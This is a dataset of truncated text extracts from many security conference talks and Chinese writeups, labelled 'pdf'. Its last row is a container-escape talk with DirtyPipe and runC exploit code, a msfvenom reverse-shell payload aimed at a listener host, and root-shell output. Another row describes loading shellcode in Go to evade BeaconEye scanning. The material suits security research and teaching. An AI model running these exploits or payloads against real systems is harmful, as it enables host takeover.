text
stringlengths
100
9.93M
category
stringclasses
11 values
Dan Hubbard VP Security Research Perpetual Beta = Live Testing = Trouble Airline Terminals using Active Script Start : Middle : End Wait, the Web has version numbers? Web Two Dot UH-OH or Exploit 2.0 An introduction to HoneyJax – Definitions – Reasons for deploying them – Types: Passive, Active HoneyJax, Passive Aggre...
pdf
Buying time - What is your data worth? "The power which money gives is that of brute force; it is the power of the bludgeon and the bayonet." -- William Cobbett "When in doubt, use brute force." -- Ken Thompson Who am I? Adam Bregenzer (adam@bregenzer.net, adam@sli.cc) ● Member of Kaos Theory and DC404 ● Developer for...
pdf
1 SweetPotato中EFS提权错误 各位师傅晚上好,今天我在虚拟机中测试SweetPotato,在Win10中是正常运⾏的,但是在Win2016中 ⽆法正常运⾏。SeImpersonatePrivilege开启是正常开启的,通过Procmon查看发现没有访问成功? Windows2016(提权失败): Windows10(提权成功):
pdf
Ghost in the Droid Possessing Android Applications with ParaSpectre Jeff Dileo (chaosdata) DEFCON 25 Hi! I’m Jeff, and I have a problem. I like to do bad things to worse programming languages. *audience says* Hiiiiiiiiiiiiiiiiii Jeff Outline • Introduction • Motivation • Original Plan • Android Function Hooking 102 • Para...
pdf
Android weblogin: Google's Skeleton Key Craig Young, Tripwire VERT # whoami I research, identify, and disclose vulnerabilities as a senior researcher in Tripwire VERT. I enjoy long bike rides, breaking things which fail to sanitize input, and building furniture with my wife on the weekend. DISCLAIMER: I am definitel...
pdf
我的安全视界观 aerfa 作者:aerfa 发布:微信公众号“我的安全视界观” 日期:2020 年 2 月 29 日 我的安全视界观 aerfa 目 录 1 致读者................
pdf
author:pen4uin time:2021/11/13 别想用我源码:针对源码泄露的反制思路(仅供娱乐) 目录 0x01 起 0x02 承 0x03 转 Maven Gradle 0x04 合 0x01 起 自从看了@DriverTom师傅写的这篇文章后, 给我带来的感受就是,关于攻防演练的“潜规则”就只剩下 0x02 承 之前在fofa的帮助“捡到”了几套源码 同时,也从github从git clone了很多工具的源码(java)进行review 学习,但是在IDEA初次打开的时候, 相信大家对下面这个弹窗不会陌生 我不知道你们的选择是什么,我之前都是毫不在意地Trust Project,然后使用maven打包运行。 但是...
pdf
BeaconEye绕过小记 应L.N.大佬的邀请写一下绕过的复现过程。 最近C2开发群内都在讨论关于cs绕过内存检测的话题。 在今天下午首先是看到了这样一个绕过手段: 希望大佬能讲讲原因。 虽然我也不知道啥意思,总之感觉很厉害就去复现了。 刚好最近在整理关于golang调用api的东西 具体golang调用的代码如下 SymInitialize api如果执行成功会返回为true 加入这一段后就还是常规的alloc -> write -> execute加载stageless shellcode. 然后上线了: Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") SymInitialize := ...
pdf
! 1! WRITING!YOUR!FIRST!EXPLOIT! LECTURE!NOTES! ! Robert!Olson! Lecturer! Dept.!of!Computing!&!Info!Sciences! SUNY!at!Fredonia! olsonr@fredonia.edu! @nerdprof! https://github.com/nerdprof/Writing-Your-First-Exploit! ! ! ! ! ! 1. Laboratory!Setup! a. Virtual)Machines) i. Windows!VM! ! ! ! ! A!Windows!virtual!machine!can...
pdf
Grifter and Metacortex @grifter801 @metacortex A TOUR THROUGH THE DARKSIDE OF THE INTERNET THESE GUYS • Grifter (@grifter801) • DEF CON Goon • Multiple time DEF CON Speaker • DC801 Founder • Founder of 801 Labs Hacker Space in SLC • Metacortex (@metacortex) • DC801 Organizer • Founder of the 801 Labs Hacker Space in S...
pdf
Untrustworthy Hardware And How to Fix It Seeking Hardware Transparency PRESENT DAY. PRESENT TIME ⌷ - ##FPGA, ##crypto and #openRISC on Freenode - Shorne and Olofk from #openRISC (hardware and cross-compilation help) - PropellerGuy (Parallax Propeller open-source IO interface) - Maitimo, International Financ...
pdf
致远OA漏洞分析 hw已经开始2天啦,期间爆出不少漏洞,这也是⼀个不错的学习机会,可以学⼀下⼤佬的挖洞姿势。 看到致远OA出现了漏洞,随笔写下分析⽂章。经典的组合漏洞。其实只要进了后台,还是有⼏个⽅法可以拿到shell的。 本机环境: Windows 10 Mysql 5.5.37 S1 V1.9.5/Seeyon A8+/V7.0 SP1 ⼀.任意账户登陆分析 根据互联⽹上的POC来看。漏洞在 /thirdpartyController.do" 且method为 access . 根据xml配置⽂件确定 thirdpartyController.do 对应类为 com.seeyon.ctp.portal.sso.thirdpar...
pdf
1 关于Tomcat中的三个Context的理解 Context ServletContext ApplicationContext StandardContext @yzddmr6 p⽜在知识星球⾥问了⼀个问题:Tomcat中这三个StandardContext、ApplicationContext、 ServletContext都是⼲什么的 skay师傅给出了⾃⼰的理解:https://mp.weixin.qq.com/s/BrbkTiCuX4lNEir3y24lew 这⾥来讲⼀讲我的理解,说的不⼀定对,仅供参考。 context是上下⽂的意思,在java中经常能看到这个东⻄。那么到底是什么意思呢? 根据我的理解,如果把某次请求...
pdf
2020/10/22 编辑 实战渗透-基于DWR框架下的漏洞探测 - Sooooooooooooooooooo,Skr!~ - Powered by Typecho https://www.websecuritys.cn/admin/write-post.php?cid=182 1/10 前言 未经授权,禁止转载! 0x01 前段时间,在对某站群系统进行代码审计时,发现某处DWR-AJAX接口存在文件上传漏洞 代码层: 可以清楚的看到这里是一处文件上传漏洞,在进行存储的过程中,未进行任何文件类型效验操作。 由于是dwr框架,可以通过dwr.xml 查看映射关系 public String upload(InputStream is,...
pdf
Real World Privacy DEFCON 12 July 30, 2004 Real World Privacy How to leave fewer breadcrumbs in life by Roger Cooke n0namehere@yahoo.com Real World Privacy DEFCON 12 July 30, 2004 What are you talking about? The focus here is not a ‘why’ talk, we’re talking the how. If you need to know why, leave your full name, DOB...
pdf
l i n u x 内 核 漏 洞 检 测 与 防 御 蒋浩天/张海全 腾讯安全云鼎实验室 自我介绍 蒋浩天: 擅长二进制安全、虚拟化安全、游戏安全等,喜欢研究一些底层方向,将安全能力下沉,开启安 全对抗的上帝模式。 张海全: 主要从事GCC和Linux内核安全功能研发,Linux内核源码贡献者。 主要方向是漏洞挖掘,CFI防 御,编译器sanitizer。致力于将漏洞扼杀在编译器中。 l 漏洞攻防现状 l 漏洞利用技术 l 传统漏洞防御技巧 l 基于intel pt的漏洞检测方案 l 基于编译器的漏洞防御方案 l 后续展望 大纲 漏洞攻防现状 主机漏洞防御价值 • 系统漏洞可通杀,是云主机最主 要威胁。 • 挖矿/勒索等入侵的必争...
pdf
对⼀些基于chrome的dom-xss插件学习,有 dom-based-xss-finder 和 XssSniper ,看看它们的原理是什么。 mainfest.json 对于chrome来说,mainfest.json包含了整个插件各种配置,在配置⽂件中,可以找到插件⼀些启动的源代码。 ⼏个⽐较重要的⼏个字段 browser_action 这个字段主要负责扩展图标点击后的弹出内容,⼀般为popup.html content_scripts matches 代表scripts插⼊的时机,默认为document_idle,代表⻚⾯空闲时 js 代表插⼊的scripts⽂件路径 run_at 定义了哪些⻚⾯需要插⼊scripts per...
pdf
Protecting Data with Short- Lived Encryption Keys and Hardware Root of Trust Dan Griffin DefCon 2013 What does the NSA think? • The NSA has been public about: – The inevitability of mobile computing – The need to support cloud-based services – Even for use with secret data in the field • General Alexander, head of the...
pdf
调用栈 lookup:172, JndiManager (org.apache.logging.log4j.core.net) lookup:56, JndiLookup (org.apache.logging.log4j.core.lookup) lookup:221, Interpolator (org.apache.logging.log4j.core.lookup) resolveVariable:1110, StrSubstitutor (org.apache.logging.log4j.core.lookup) substitute:1033, StrSubstitutor (org.apache.logging.log...
pdf
Offensive Windows IPC Internals 2: RPC Contents: The Series Introduction History RPC Messaging RPC Protocol Sequence RPC Interfaces RPC Binding Anonymous & Authenticated Bindings Registration Flags Security Callbacks Authenticated Bindings Well-known vs Dynamic Endpoints RPC Communication Flow Sample Implementation A...
pdf
© 2012 Presented by: Pwn’ing you(r) cyber offenders Piotr Duszynski @drk1wi © 2012 ;WHOAMI;#? •  Senior Security Consultant @Trustwave OSCP, OSCE, CEH •  In security field for the past 6 years, hacking since 9 … •  Enjoys security research, crazy road trips, mojitos and good music •  Regardless of this slide ...
pdf
​ apt-get install binfmt-support qemu-user-static qemu qemu-system 1. ​ QEMU 0x00 QEMU 0x01 QEMU ​ cp $(which qemu-aarch64-static) ./ sudo chroot . ./qemu-aarch64-static ./bin/ls ​ 2. ​ ​ 1. ​ apt-get install bridge-utils uml-utilities 0x02 QEMU brctl addbr br0 #br0bridge brctl addif br0 eth0 #br0eth0 brct...
pdf
Windows GDI Local Kernel Memory Overwrite Vulnerability researched and exploit developed by Joel Eriksson <joel.eriksson@bitsec.com> About the bug The Graphics Device Interface, GDI, is part of the Win32-subsystem and is responsible for displaying graphics on devices such as video displays as well as printers. Bas...
pdf
Constructing ELF Metadata DEFCON 20 July 28, 2012 Rebecca Shapiro and Sergey Bratus Dartmouth College Who? What? Where? Image by Stripey the crab [CC-BY-SA-3.0] This Talk in One Minute  ”Deep magic” before a program can run  ELF segments, loading, relocation,  ”Deeper magic” to support dynamic linking  Dynamic sym...
pdf
Hacking BLE Bicycle Locks for Fun & A Small Profit 1 whoami • From Sunny Singapore • Senior Security Consultant @ MWR • Mobile and Wireless geek – BlackHat USA 2016 – Bad for Enterprise: Attacking BYOD Enterprise Mobile Security Solutions 2 Bike-Sharing Economy and the BLE “Smart” Lock 1 Overview 3 Building a Maste...
pdf
By Paul Wouters <paul@xtdnet.nl> _ Theory of DNSSEC _ Using bind with DNSSEC _ Securing “.nl” with SECREG _ Deploying DNSSEC on large scale Overview presentation PART ONE: DNSSEC _ IPsec basics _ What is Opportunistic Encryption _ Protecting the net with OE _ Installing and Configuring OE _ Securing the wireless: Wave...
pdf
Controlling the Source: Abusing Source Code Management Systems Brett Hawkins (@h4wkst3r) Adversary Simulation, IBM X-Force Red Agenda 2 IBM Security / © 2022 IBM Corporation • Introduction • Source Code Management Systems • GitHub Enterprise • GitLab Enterprise • Bitbucket • SCMKit • Demos • Defensive Considerations ...
pdf
针对智能设备漏洞挖掘的 一些新方法 小灰灰 百度安全实验室 高级安全研究员 30-May2019 2 关于我 百度安全实验室 高级安全研究员 研究领域:IoT安全/AI安全/无人车安全 多次破解硬件设备 之前负责: • BSRC、应急处置、0day分析 • 百度产品 安全评估 • 百度安全监控体系建设 传统IOT设备的破解 路由器? 固件下载 Binwalk解包 找到有问题的bin(why?) IDA分析、WEB 脚本文件分析 漏洞验证(真机or QEMU测试) 大多数 好像都是漏洞分析 现在? IOT设备越来越多种多样, not only 路由器 大厂也不会让你轻易破解 • 固件不提供下载 • telnet、串口、ADB都关闭 •...
pdf
1 目录 关于OWASP “开源Web应用安全项目”(OWASP)是一个开放 的社区,致力于帮助各企业组织开发、购买和维护可信任 的应用程序。 在OWASP ,您可以找到以下免费和开源的信息: • 应用安全工具和标准; • 关于应用安全测试、安全代码开发和安全代码审查 方面的完整书籍; • 演示文稿和视频; • 关于常见风险的Cheat Sheets; • 标准的安全控制和安全库; • 全球各地分会; • 尖端技术研究; • 专业的全球会议; • 邮件列表。 更多信息,请访问: https://www.owasp.org。 更多中文信息,请访问:http://www.owasp.org.cn/。 所有的OWASP工具、文档、论坛和全...
pdf
World War 3.0 Chaos, Control & The Battle for the Net DEFCON 20 World War 3.0 Chaos, Control & The Battle for the Net DEFCON 20 ABSTRACT: There is a battle under way for control of the Internet. Some see it as a fight between forces of Order (who want to superimpose existing, pre-digital power structures and their no...
pdf
D0 N0 H4RM: A HEALTHCARE SECURITY CONVERSATION D0#No#H4rm# a#healthcare#security#conversation# D0 N0 H4RM: A HEALTHCARE SECURITY CONVERSATION D0#No#H4rm# a#healthcare#security#conversation# Fireside Fireside Hax Moderators Christian#Dameff,#MD# UC#San#Diego# Jeff#Tully,#MD# UC#Davis# Josh#Corman# CSO#PTC# I...
pdf
技 术 标 准 研发运营一体化能力成熟度模型 第 3 部分:持续交付过程 The DevOps capability maturity model Part 3: Continuous delivery process (征求意见稿) 2017 年 11 月 18 日 YDB XXXXX—XXXX I 目 次 目次................................................................................... I 前言.................................................................
pdf
CSRF: Yeah, it still works… Mike Bailey,  skeptikal.org Russ McRee,  holisticinfosec.org DISCLAIMER: • The views, opinions, and  methodologies discussed here  do not reflect those of our  employers, thus no smack talk  herein is to be attributed to  anyone other than Mike and  Russ. The XSS Epidemic: Discovery, disclos...
pdf
​ /por/login_auth.csp?apiversion=1 HTTP/1.1 200 OK Date: Thu, 01 Apr 2021 01:11:26 GMT Server: Server X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Pragma: no-cache Cache-Control: no-cache Content-Length: 2434 X-Robots-Tag: noindex, nofollow, noarchive, nosnippet, nosnippet, notranslate, noimageindex Con...
pdf
LAN PROTOCOL ATTACKS PART 1 - ARP RELOADED Presented at Defcon 15 Las Vegas, NV 2007 Jesse ‘x30n’ D’Aguanno jesse[at]praetoriang.net / x30n[at]digrev.org Defcon 15 Las Vegas, NV August 2007 Jesse D’Aguanno (c) Copyright 2007 Praetorian Global, LLC Background • $whoami – Jesse ‘x30n’ D’Aguanno – Director of Profession...
pdf
CREATING THE DEFCON CHINA 1.0 BADGE joe Grand aka kingpin introduction / badge history • bring community together through interactivity • create game to encompass the defcon experience • simple design that could be expanded during/after defcon • interactive, command-based menu for additional exploration goals • comp...
pdf
Pinworm Man in the middle for metadata @bigezy_(bigezy) @itsasstime (saci) [need to add Introduction section] My previous related • Badger: Blackhat 2014 https://www.blackhat.com/docs/us- 14/materials/us-14-Rogers-Badger-The- Networked-Security-State-Estimation- Toolkit.pdf • Kobra: BsidesLV 2015 https://youtu.be/gOM...
pdf
1 Extracting the painful (blue)tooth Matteo Beccaro • Security Consultant at Secure Network • Technical Research Leader at Opposing Force, Physical Security division of Secure Network • @_bughardy_ { Matteo Collura • Student at Politecnico di Torino (www.polito.it) • Electronic Engineer • Researcher in several fields ...
pdf
Wireless Aerial Surveillance Platform W.A.S.P. DEFCON 19 Who we are. Project Inception - October 2009 • “Dude, I have an idea…” • Build a UAV • Provide remote penetration testing capabilities • Useable flight time (~1 hour) • Man portable • Design Philosophy • Low cost • Utilize open source and off-the-s...
pdf
BRAIN GAMES Make your own Biofeedback Video Game Ne0nRa1n That Strange Little 'Brain Girl' Joe Grand aka Kingpin www.kingpinempire.com What is old is new again! Interest in the human brain has been around for a very long time. The first known writing on the brain is found in ancient Sumerian records from 4000 B.C, wh...
pdf
Spring Part 2 SpringMVC 审了⼀些Spring的项⽬,还是打算以开发的⻆度从头看⼀下,Spring第⼀部分之前发过⼀遍,这 次打做⼀个补全。跟着B站的视频看的,迷迷糊糊视频快进看了⼀个⼩时,感觉东⻄也不多.....其 实直接上代码看别⼈怎么写的更有效率⼀点233333333 Part3 感觉看下源码分析⽐较好,额,好像springboot也要简单过下,虽然审过了,但是查漏补 缺嘛~ 《Spring Part 1 四天学习总结》 https://mp.weixin.qq.com/s/Qqu11XiZkWchhQ15y0J0_A ⼀、SpringMVC 的基本概念 1. 三层架构 表现层、业务层、持久层 2.MV...
pdf
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 ...
pdf
1 软件安全漏洞挖掘 技术探讨 文伟平 博士 北京大学软件与微电子学院 小组主页:www.pku-exploit.com 联 系 Q Q:513357938 漏洞挖掘技术难点 漏洞挖掘本身的难度 函数模型(Windows 7之前系统) 逻辑模型 安全开发平台 云计算 虚拟化 系统安全对抗 Windows 7,8系统安全防护机制 IE 的Use after Free GS,SafeSEH,DEP和ASLR ROP,Heap Spray,JIT Spray SharedUserData 小组主页:www.pku-exploit.com 联 系 Q Q:51335793...
pdf
digita security The Mouse is mightier than the sword WHOIS cybersecurity solutions for the macOS enterprise @patrickwardle synack digita nsa nasa Outline the targets (past) attacks mitigations full bypass weaponization digita security THE TARGETS 'tempting' UI components The Attacker's Conundrum keychain kexts key...
pdf
Nathan Seidle SparkFun Electronics Combos in 45 minutes or less!* *You know what these mean… 2002 Animation: How combination safe works Power! Motor with 8400 tick encoder Servo with feedback Arduino Handle puller Magnets Erector set (Actobotics) The super freaking amazing nautilus gear that made this all work ‘...
pdf
1 The Tor Project Our mission is to be the global resource for technology, advocacy, research and education in the ongoing pursuit of freedom of speech, privacy rights online, and censorship circumvention. 2 ● Online Anonymity – Open Source – Open Network ● Community of researchers, developers, users and relay ...
pdf
某C2鸡肋漏洞分析 2022-05-12 · 基础设施 CobaltStrike是一个知名的红队命令与控制框架,采用 Beacon <-> TeamServer <-> Client 架构。TeamServer 存在受限路径穿越写文件与反序列化漏洞,可以被认证后客户端恶意利用。Client存在反序列化漏洞,可以被 RogueCS攻击。 Author: hosch3n@逐日实验室 山寨威胁建模 由于这个软件的特殊性,我们需要想想什么才是漏洞: 1. 直接攻击TeamServer暴露的服务 2. 通过Beacon攻击TeamServer 3. 通过Client攻击TeamServer 4. 通过TeamServer攻击Client Te...
pdf
Hacking UFOlogy: Thirty Years in the Hall of Mirrors notes for a presentation by Richard Thieme Def Con 15 – August 2007 These are notes – meant to be supportive of the one hour presentation made at Def Con 15 and suggestive of further avenues of inquiry. Consult the select bibliography at the end for further read...
pdf
企业应用层面临的IT安全风险与危机 何迪生 Dixon Ho OWASP AppSec Asia 2016 今天分享的内容 What we will share today !!! • 安全领域的未来 What Security Domain will look Like in the Future • 当前面临的最大挑战 Review of today’s Security Challenge • 下一步应该做什么? What should we do immediately/next step? 安全领域未来的世界是什么样…. Let‘s discuss about what the Security Domain will l...
pdf
1 CVE-OLOO-OOXVQ扩展 中午看了下这篇⽂章https://mp.weixin.qq.com/s/S15erJhHQ4WCVfF0XxDYMg,发现了点问题,记 录下 选⽤RequestMapping内存⻢,demo如下 2 测试的时候发现注⼊可以成功,但⽆法访问executeCommand⽅法,查看报错堆栈,提示参数错误,没 有指定executeCommand需要的String参数,但实际有传。 Java 复制代码 public class SpringRequestMappingMemshell {    public static String doInject(Object requestMappingHa...
pdf
Web2Own ATTACKING DESKTOP APPS FROM WEB SECURITY'S PERSPECTIVE Who are we • 9aX.TgUh • LYbWYbhKYWifhmPiUbkiEUV • FYaVYf cZ)cdg<L?LYUa • KdYU_Yf cZ RYfcG\hg+)*1UbX ABL;+)*1=iVU Who are we • 9AYUfaYb* • KYWifhmJYgYUfW\YfbLYbWYbhKYWifhmPiUbkiEUV • KdYU_YfcZ:gUKYWOYgh +)*1 Who are we • 9L)a-hcT • KYWifhmJYgYUfW\YfbLYbWYbhK...
pdf
SELECT code_execution FROM * USING SQLite; -- gaining code execution using a malicious SQLite database Omer Gull Check Point Research whoami • Omer Gull • Vulnerability Researcher • Check Point Research for the past 3 years • Now at Hunters.AI Agenda • Motivation and back story • SQLite3 Intro • Examining the att...
pdf
CTF For Beginner bananaapple $whoami? • bananaapple • 交通大學資工系大四 • 從開始學習資安到現在約一年 • 專長 : Binary exploit • 目前為 Bamboofox 中的一員 • 曾經參與的比賽 • CTCTF ( 台交駭客搶旗賽 ) • Bosten key party CTF 2015 • DEF CON CTF Qualifier 2015 • HoneyMe CTF • …… 故事的開始 DESCRIPTION 這是專在講 "程式不安全" 的課程,也建立一個 wargame.cs.nctu.edu.tw 的專屬網站。這門課最早在96年開設,中 間斷了幾年,...
pdf
VirGraf101: An Introduction to Virtual Graffiti Tottenkoph What is virtual graffiti? • Virtual objects and/or digital messages, images, animations, etc. • Applied to or viewable from public locations • Can be viewed through: – Computers – Mobile devices – Billboards – Signs – Side of buildings What we’re covering • H...
pdf
Disclaimer: This presentation is based upon personal research that was not supported or authorized by my employer. The material being presented may be considered offensive to those with weak hearts, a sense of ethics, or those highly invested in technology funds. Robert Stucke bobx@rot26.net DNS Has Been Found To Be Ha...
pdf
Compelled Decryption State of the Art Doctrinal Perversions by Ladar Levison Owner and Operator, Lavabit LLC Version 1.0 July 8th 2016 DEF CON 24 PRESENTATION PREVIEW PLEASE NOTE THESE SLIDES ARE PRELIMINARY EXPECT ALTERATIONS First Party vs Third Party Communications Assistance for Law Enforcement Act (aka CALEA) Th...
pdf
[译] 渗透测试实战第三版(红队版) 译者:Snowming(雪茗) 时间:北京时间 2019-03-17 本书英文名:The Hacker Playbook 3 阅读 在 Github 上阅读本书 免责声明 @Snowming 纯粹出于学习目的与个人兴趣翻译本书。本人承诺绝不用此译文谋取任何形式的经济利益。也坚决拒绝 其他任何人以此牟利。 本译文只供学习研究参考之用,不得用于商业用途。@Snowming 保留对此版本译文的署名权及其它相关权利。 若有人使用本译文进行侵权行为或者违反知识产权保护法的任何行为,与本译者无关。译者坚决反对此类行为。 任何转载必须注明出处。 译者的话 这本书是 The Hacker Playbook 的...
pdf
Game of Drones PUTTING THE EMERGING ‘DRONE DEFENSE’ MARKET TO THE TEST DEF CON 25 (2017) – LAS VEGAS, NV July 29, 2016 Presented by: • Francis ‘tastic’ Brown • David Latimer Bishop Fox, LLC www.bishopfox.com 2 1. The Danger Drone by Bishop Fox 2. Crazy State of Drone Defense Market 3. Drone Legal Landscape...
pdf
Truman Kain TEVORA Your Lookout on Autopilot Surveillance Detection TL;DR Autopilot cameras are good for a lot more than driving. So are Teslas. Why Tesla? •Three Cameras Built In* •Detailed Vehicle/Owner API •Sentry Mode (Always On) •In-Car Web Browser Surveillance Detection Scout •Real-Time License Plate Recogn...
pdf
ERROR: type should be string, got "https://www.comp.nus.edu.sg/programmes/pg/misc/\nØ\nGitHub:brant-ruan\nØ\nBlog:blog.wohin.me\nØ\n5G\nØ 盟\nØ \nØ\nMetarget\nAboutMe\nCONTENTS\n01\n02\n04\nDirtyPipe\nCVE-2019-5736\n03\n05\nrunC\nsrc: https://containerd.io/img/architecture.png\n故事要从DirtyPipe讲起\n01\nDirtyPipe (CVE-2022-0847)\nTheDirtyPipeVulnerability\nMaxKellermann max.kellermann@ionos.com\nAbstract\nThisisthestoryofCVE-2022-0847,avulnerabilityintheLinuxkernel\nsince5.8whichallowsoverwritingdatainarbitraryread-onlyfiles.\nThisleadstoprivilegeescalationbecauseunprivilegedprocessescan\ninjectcodeintorootprocesses.\nItissimilarto CVE-2016-5195DirtyCow butiseasiertoexploit.\nThevulnerability wasfixed inLinux5.16.11,5.15.25and5.10.102.\n➜ dpuname-r\n5.8.0-050800rc1-generic\n➜ dpcat/etc/passwd|head-n1\nroot:x:0:0:root:/root:/usr/bin/zsh\n➜ dp./exploit/etc/passwd1hacked\nItworked!\n➜ dpcat/etc/passwd|head-n1\nrhacked0:0:root:/root:/usr/bin/zsh\nPoC/etc/passwd\n➜ ~dockerrundirtypipe:exp-1\n[*]exploitingDirtyPipe (CVE-2022-0847)\n[+]runC openedforreadingas/proc/self/fd/3\n[+]gotentrypoint:0x232390\n[*]injectingpayloadintorunC atentrypoint 0x232390\n[+]done\nshell\n➜ ~ncat -klvnp 4444\nNcat:Version7.60(https://nmap.org/ncat )\nNcat:Generatingatemporary1024-bitRSAkey.\nNcat:Listeningon:::4444\nNcat:Listeningon0.0.0.0:4444\nNcat:Connectionfrom192.168.3.101.\nNcat:Connectionfrom192.168.3.101:51995.\nexit\nNcat:Connectionfrom192.168.3.101.\nNcat:Connectionfrom192.168.3.101:51998.\npython3-c\"importpty;pty.spawn('/bin/bash')\"\n<08da5d2c57febb811f43f7ddf67a647d38c8e370d914ef6af#\n<08da5d2c57febb811f43f7ddf67a647d38c8e370d914ef6af#cd/\ncd/\nroot@ubuntu-bionic:/#\nØ runC\nØ CVE-2019-5736\nØ runC...\nØ runC\nØ runC\nØ \n名噪一时的CVE-2019-5736\n02\nCVE-2019-5736\n1\n终端2\nshell1%runc runctr\nshell2%runc execctrsh\n[thiswillblockfor500seconds]#sleep 500\nshell1[ctr]#ps aux\nPIDUSERTIMECOMMAND\n1root0:00sh\n18 root0:00{runc:[2:INIT]}/proc/self/exeinit\n24root0:00ps aux\nshell1[ctr]#ls/proc/18/fd -la\ntotal0\ndr-x------ 2rootroot0Nov2814:29.\ndr-xr-xr-x9rootroot0Nov2814:29..\n...\nlr-x------ 1rootroot64Nov2814:294->/run/runc/test\n...\nshell1[ctr]#ls-la/proc/18/fd/4/../../..\ntotal0\n...\ndrwxr-xr-x1rootroot1872Nov2509:22bin\ndrwxr-xr-x1rootroot552Nov2509:46boot\ndrwxr-xr-x21rootroot4240Nov2722:09dev\ndrwxr-xr-x1rootroot4958Nov2814:28etc\ndrwxr-xr-x1rootroot12Jun1512:20home\ndrwxr-xr-x1rootroot1572Oct3012:00lib\nCVE-2016-9962\nSetinit processesasnon-dumpable\nWhoC\nnsenter:clone/proc/self/exetoavoidexposinghostbinarytocontainer\nTherearequiteafewcircumstanceswhere/proc/self/exepointingtoa\nprettyimportantcontainerbinaryisa_bad_thing,sotoavoidthiswe\nhavetomakeacopy(preferablydoingself-clean-upandnotbeing\nwriteable).\nWerequirememfd_create(2)-- thoughthereisanO_TMPFILEfallback--\nbutwecanalwaysextendthistouseascratchMNT_DETACHoverlayfs or\ntmpfs.Themaindownsidetothisapproachisnopage-cachesharingfor\ntherunc binary(whichoverlayfs wouldgiveus)butthisisfarless\ncomplicated.\nThisisonlydoneduringnsenter sothatithappenstransparentlytothe\nGocode,andanylibcontainer usersbenefitfromit.Thisalsomakes\nExtraFiles and--preserve-fds handlingtrivial(becausewedon'tneedto\nworryaboutit).\nFixes:CVE-2019-5736\nCo-developed-by:ChristianBrauner <christian.brauner@ubuntu.com>\nSigned-off-by:Aleksa Saraiasarai@suse.de\nnsenter:cloned_binary:trytoro-bind/proc/self/exebeforecopying\nTheusageofmemfd_create(2)andothercopyingtechniquesisquite\nwasteful,despiteattemptstominimise itwith_LIBCONTAINER_STATEDIR.\nmemfd_create(2)added~10Mofmemoryusagetothecgroup associatedwith\nthecontainer,whichcanresultinsomesetupsgettingOOM'd (orjust\nhoggingthehosts'memorywhenyouhavelotsofcreated-but-not-started\ncontainersstickingaround).\nTheeasiestwayofsolvingthisisbycreatingaread-onlybind-mountof\nthebinary,openingthatread-onlybindmount,andthenumounting itto\nensurethatthehostwon'taccidentallybere-mountedread-write.This\navoidsallcopyingandcleansupnaturallyliketheothertechniques\nused.Unfortunately,liketheO_TMPFILEfallback,thisrequiresbeing\nabletocreateafileinside_LIBCONTAINER_STATEDIR(sincebind-mounting\noverthemostobviouspath-- /proc/self/exe-- isa*verybadidea*).\nUnfortunatelydetectingthisisn'tfool-proof-- onasystemwitha\nread-onlyrootfilesystem(thatmightbecomeread-writeduring\"runc\ninit\"execution),wecannottellwhetherwehavealreadydoneanro\nremount.Asapartialmitigation,westorea_LIBCONTAINER_CLONED_BINARY\nenvironmentvariablewhichischecked*alongside*theprotectionbeing\npresent.\nSigned-off-by:Aleksa Saraiasarai@suse.de\n2019-03-01 v1.0.0-rc7\n2019-02-08 v1.0.0-rc7\nLXCmemfd\nCVE-2019-5736(runC):rexec callersasmemfd\nAdamIwaniuk andBorys Popławski discoveredthatanattackercancompromisethe\nrunC hostbinaryfrominsideaprivilegedrunC container.Asaresult,this\ncouldbeexploitedtogainrootaccessonthehost.runC isusedasthedefault\nruntimeforcontainerswithDocker,containerd,Podman,andCRI-O.\n➜ lxc git:(master)tail-n14./src/lxc/rexec.c\n/**\n*Thisfunctionwillcopyanybinarythatcallsliblxc intoamemoryfileand\n*willusethememfd torexecute thebinary.Thisisdonetopreventattacks\n*throughthe/proc/self/exesymlink tocorruptthehostbinarywhenhostand\n*containerareinthesameusernamespaceorhavesetupanidentityid\n*mapping:CVE-2019-5736.\n*/\n__attribute__((constructor))staticvoidliblxc_rexec(void)\n{\nif(getenv(\"LXC_MEMFD_REXEC\")&&lxc_rexec(\"liblxc\")){\nfprintf(stderr,\"Failedtore-executeliblxc viamemoryfiledescriptor\\n\");\n_exit(EXIT_FAILURE);\n}\n}\nØ runC\nØ runCro mount\nØ runC =>\nØ memfd\nØ ro mount\nØ 呢\n常见利用场景与利用手法\n03\n前提:runC是动态链接的\nvarpayload=\"#!/bin/bash\\n\"+shellCmd\nfor{\nwriteHandle,_:=os.OpenFile(\"/proc/self/fd/\"+strconv.Itoa(handleFd),os.O_WRONLY|os.O_TRUNC,0700)\nifint(writeHandle.Fd())>0{\nwriteHandle.Write([]byte(payload))\n//msfvenom -ax86-plinux/x86/execCMD=\"id>/tmp/hacked&&hostname>>/tmp/hacked\"-felf\nconstunsignedcharmalicious_elf_bytes[]={\n/*0x7f,*/0x45,0x4c,0x46,0x01,0x01,0x01,0x00,0x00,0x00,0x00,0x00,\n/*ELF */\n};\nintmain(intargc,char**argv){\nif(write_with_dirtypipe(path,1,malicious_elf_bytes,malicious_elf_bytes_size)!=0){\nrunc_fd_read =open(\"/proc/self/exe\",O_RDONLY);\nlseek(runc_fd_read,ELF_ENTRYPOINT_OFFSET,SEEK_SET);\nnbytes =read(runc_fd_read,&entrypoint,sizeof(entrypoint));\n//msfvenom -plinux/x64/shell_reverse_tcp LHOST=1.1.1.1LPORT=4444-fraw|xxd -i\ncharpayload[]={\n0x6a,0x29,0x58,0x99,0x6a,0x02,0x5f,0x6a,0x01,0x5e,0x0f,0x05,\n/*payload */\n};\nwrite_with_dirtypipe(runc_fd_read,entrypoint,payload,payload_len);\nELF\nELF\nDirtyPipe\nCVE-2022-0185runC\nUAFPipe Buffer Flag\n->Dirtypipe\n->DirtypiperunC\n->\nØ \nØ payload\nØ runC\nØ runCDirtyPipe\n探索更优雅的利用手法\n04\nELFELF\n➜ file`whichrunc`\n/usr/local/sbin/runc:ELF 64-bitLSBexecutable,x86-64,version1(SYSV),\nstaticallylinked,BuildID[sha1]=0afa4292e5163007028fbde6effb1a2edc1a3f49,forGNU/Linux3.2.0,stripped\n➜ xxd 